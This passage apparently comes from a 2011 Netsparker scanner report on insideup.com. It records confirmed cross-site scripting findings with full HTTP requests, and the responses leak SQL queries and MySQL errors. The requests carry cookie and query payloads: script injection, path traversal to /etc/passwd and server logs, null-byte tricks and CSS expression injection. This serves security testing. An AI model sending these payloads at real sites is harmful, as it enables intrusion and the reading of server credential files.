OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=m0h9ngmh52ho18u7s7imbg61o6; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B7)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/

/ppc/leadflow/inco00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005B5)</script>

Request

GET /ppc/leadflow/inco00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5q8q07e84mqpqo0b3qb4jd2qc1; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>' OR prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>' OR prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>' OR prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>' OR prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>' OR prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?'"--></style></script><script>alert(0x0005B9..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005B9)</script>

Request

GET /ppc/leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kt1nh2u0audhkb31o3i4d9ro62; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005BC)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/meac00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005BC)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
